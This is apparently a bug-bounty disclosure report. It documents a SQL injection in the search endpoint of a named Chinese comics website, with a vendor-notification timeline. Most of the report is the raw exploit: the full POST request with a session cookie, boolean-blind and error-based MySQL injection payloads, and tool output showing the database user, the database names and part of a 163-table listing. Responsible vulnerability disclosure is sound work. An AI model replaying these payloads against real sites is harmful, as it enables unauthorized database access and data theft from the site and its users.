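2015-05-25: Details reported to the vendor; awaiting vendor response
2015-05-26: Vendor confirmed; details disclosed to the vendor only
2015-06-05: Details disclosed to core white hats and experts in related fields
2015-06-15: Details disclosed to regular white hats
2015-06-25: Details disclosed to trainee white hats
2015-07-10: Details disclosed to the public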
233
POST injection

POST /paxy/safeCampusSearch.html HTTP/1.1
Content-Length: 142
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: www.muu.com.cn
Cookie: JSESSIONID=abcmO14VJs6AS6IHT_e2u; read1=13059%2C%E5%9B%9B%E5%8F%B6%E5%A8%83%E5%A8%83%E5%92%8C%E5%91%9C%E5%96%B5-%E9%AB%98%E8%80%83-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13059%2F88003_1.html%2C%2Fcomics%2F13059%2F88003_1.html%2C2%2C19%2C1%2C1; /comics/8490=/comics/8490/50511_1.html; read2=13540%2C%E6%99%B4%E7%A9%BA%E4%B8%8B-%E7%AC%AC%E5%9B%9B%E5%9B%9E-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F13540%2F99880_1.html%2C%2Fcomics%2F13540%2F99880_1.html%2C4%2C15%2C1%2C9; /comics/5924=/comics/5924/76943_1.html; read3=14886%2C41%E5%8E%98%E7%B1%B3%E7%9A%84%E8%B6%85%E5%B9%B8%E7%A6%8F-+%E5%96%9C%E6%AC%A2%E5%B0%B1%E6%98%AF%E5%96%9C%E6%AC%A2%E5%95%8A%EF%BC%81-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14886%2F113708_1.html%2C%2Fcomics%2F14886%2F113708_1.html%2C52%2C61%2C1%2C1; /comics/11237=/comics/11237/73834_1.html; read4=14722%2C%E4%BD%8E%E4%BF%97%E7%AC%91%E8%AF%B4-4%EF%BC%8C%E6%B8%85%E6%98%8E%E8%B8%8F%E9%9D%92-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F14722%2F110731_1.html%2C%2Fcomics%2F14722%2F110731_1.html%2C4%2C25%2C1%2C1; /comics/4219=/comics/4219/20209_1.html; read5=5157%2C%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%97-%E8%85%90*%E6%94%BB%E5%8F%97%E5%B0%8F%E6%97%A5%E5%B8%B8%E7%B3%BB%E5%88%9701-%E7%AC%AC1%E9%A1%B5%2C%2Fcomics%2F5157%2F24462_1.html%2C%2Fcomics%2F5157%2F24462_1.html%2C1%2C11%2C1%2C1; /comics/5157=/comics/5157/24462_1.html; /comics/2989=/comics/2989/66457_1.html
Host: www.muu.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*

content=
---
Parameter: content (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: content=%' AND 3862=3862 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: content=%' AND (SELECT 6038 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(6038=6038,1))),0x7178787a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
[18:49:39] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5.0
[18:49:39] [INFO] fetching current user
[18:49:39] [INFO] retrieved: muu@%
available databases [2]:
[*] information_schema
[*] muu_2014

Database: muu_2014
[163 tables]
+----------------------------------+
| category                         |
| forum                            |
| forum_posts                      |
| forum_topics                     |
| spider                           |
| t_view_1                         |
| t_view_2                         |
| t_w_u_view                       |
| tb_active                        |
| tb_ad                            |
| tb_ad_stat_visit                 |
| tb_admin_recommend               |
| tb_album                         |
| tb_album_photo                   |
| tb_authorization                 |
| tb_authorization_work            |
| tb_blacklist                     |
| tb_bookmark                      |
| tb_broadcast                     |
| tb_bulletin                      |
| tb_classify                      |
| tb_collection                    |
| tb_comment                       |
| tb_comment_reply                 |
| tb_commercial_favorite           |
| tb_dic_bulltype                  |
| tb_dic_groupclass                |
| tb_dic_hittype                   |
| tb_dic_logtype                   |
| tb_dic_progress                  |
| tb_dic_ratingtype                |
| tb_dic_readerclass               |
| tb_dic_readpermiss               |
| tb_dic_recomtype                 |
| tb_dic_subjectclass              |
| tb_dic_syslogtype                |
| tb_dic_topicclass                |
| tb_dic_usertype                  |
| tb_dic_workclass                 |
| tb_editor_follow                 |
| tb_email                         |
| tb_excavate                      |
| tb_excavate_album                |
| tb_excavate_show                 |
| tb_flower_egg                    |
| tb_greet                         |
| tb_group                         |
| tb_group_member                  |
| tb_group_ship                    |
。。。。。。。。。。。
~~
Severity: High
Vulnerability Rank: 20
Confirmation time: 2015-05-26 09:36
Thanks to the white hat
None yet